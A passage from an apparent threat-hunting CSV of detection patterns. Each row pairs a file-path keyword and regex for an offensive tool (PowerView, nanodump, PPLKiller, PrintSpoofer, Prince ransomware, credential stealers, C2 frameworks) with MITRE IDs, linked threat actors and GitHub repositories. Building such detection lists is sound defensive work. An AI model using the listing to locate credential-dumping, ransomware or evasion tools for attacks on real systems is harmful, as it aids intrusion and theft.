- NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","9834" "*/PowerView.ps1*",".{0,1000}\/PowerView\.ps1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","9835" "*/powerview.ps1*",".{0,1000}\/powerview\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","9836" "*/PowerView.ps1*",".{0,1000}\/PowerView\.ps1.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","9837" "*/powerview.py*",".{0,1000}\/powerview\.py.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","9838" 
"*/powerview.py.git*",".{0,1000}\/powerview\.py\.git.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","1","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","9839" "*/PowerView3.cna*",".{0,1000}\/PowerView3\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","9840" "*/PPEnum/*",".{0,1000}\/PPEnum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","N/A","2","115","9","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z","9841" "*/ppid_spoofing.exe*",".{0,1000}\/ppid_spoofing\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","9842" "*/ppl/ppl.c*",".{0,1000}\/ppl\/ppl\.c.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","9843" "*/ppl_dump.*",".{0,1000}\/ppl_dump\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","9844" "*/PPLBlade.git*",".{0,1000}\/PPLBlade\.git.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","9845" "*/ppldump.*",".{0,1000}\/ppldump\..{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","9846" "*/PPLDump_BOF/*",".{0,1000}\/PPLDump_BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven 
- CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","9847" "*/PPLFault/*",".{0,1000}\/PPLFault\/.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","9848" "*/PPLKiller.git*",".{0,1000}\/PPLKiller\.git.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","9849" "*/PPLKiller/*",".{0,1000}\/PPLKiller\/.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","9850" "*/PPLmedic.exe*",".{0,1000}\/PPLmedic\.exe.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit 
chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","9851" "*/PPLmedic.git*",".{0,1000}\/PPLmedic\.git.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","9852" "*/pplsystem.exe*",".{0,1000}\/pplsystem\.exe.{0,1000}","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","1","N/A","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","9853" "*/PPLSystem.git*","\/PPLSystem\.git","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","1","N/A","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","9854" "*/pptp-version.nse*",".{0,1000}\/pptp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9855" "*/Prasadhak.ps1*",".{0,1000}\/Prasadhak\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9856" "*/Pre2kSpray.ps1*",".{0,1000}\/Pre2kSpray\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Pre2kSpray","Enumerate domain machine accounts and perform pre2k password spraying.","T1087.002 - T1110.003","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/eversinc33/Invoke-Pre2kSpray","1","1","N/A","N/A","8","1","69","11","2023-07-14T06:50:22Z","2023-07-05T10:07:38Z","9857" "*/precompiled-binaries.git*",".{0,1000}\/precompiled\-binaries\.git.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9858" "*/PredatorTheStealer.git*",".{0,1000}\/PredatorTheStealer\.git.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - 
wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","1","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","9859" "*/prefetch-tool.git*",".{0,1000}\/prefetch\-tool\.git.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","1","N/A","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","9860" "*/prepare.sh shell/mod_*.htaccess*",".{0,1000}\/prepare\.sh\sshell\/mod_.{0,1000}\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","#linux","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","9861" "*/pretender.exe*",".{0,1000}\/pretender\.exe.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","1","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","9862" "*/pretender.git*",".{0,1000}\/pretender\.git.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","1","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","9863" 
"*/pretender_Linux_arm.tar.gz*",".{0,1000}\/pretender_Linux_arm\.tar\.gz.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","1","#linux","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","9864" "*/pretender_Windows_x86_64.zip*",".{0,1000}\/pretender_Windows_x86_64\.zip.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","1","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","9865" "*/PrimusC2*",".{0,1000}\/PrimusC2.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","9866" "*/PrimusC2.git*",".{0,1000}\/PrimusC2\.git.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","9867" "*/Prince-Built.exe*",".{0,1000}\/Prince\-Built\.exe.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","1","N/A","N/A","10","","N/A","","","","9868" 
"*/Prince-Ransomware.git*",".{0,1000}\/Prince\-Ransomware\.git.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","1","N/A","N/A","10","","N/A","","","","9869" "*/PrintCreds.py*",".{0,1000}\/PrintCreds\.py.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","1","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","9870" "*/printerbug.py*",".{0,1000}\/printerbug\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","9871" "*/printerbug.py*",".{0,1000}\/printerbug\.py.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","9872" "*/printernightmare.ps1*",".{0,1000}\/printernightmare\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","9873" 
"*/PrintMonitorDll.*",".{0,1000}\/PrintMonitorDll\..{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","9874" "*/PrintMonitorDll/*",".{0,1000}\/PrintMonitorDll\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","9875" "*/PrintNightmare.git*",".{0,1000}\/PrintNightmare\.git.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/outflanknl/PrintNightmare","1","1","N/A","N/A","10","4","337","67","2021-09-13T08:45:26Z","2021-09-13T08:44:02Z","9876" "*/printnightmare.py*",".{0,1000}\/printnightmare\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of 
large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9877" "*/PrintSpoofer.dll*",".{0,1000}\/PrintSpoofer\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","9878" "*/PrintSpoofer.exe*",".{0,1000}\/PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","9879" "*/PrintSpoofer.exe*",".{0,1000}\/PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - 
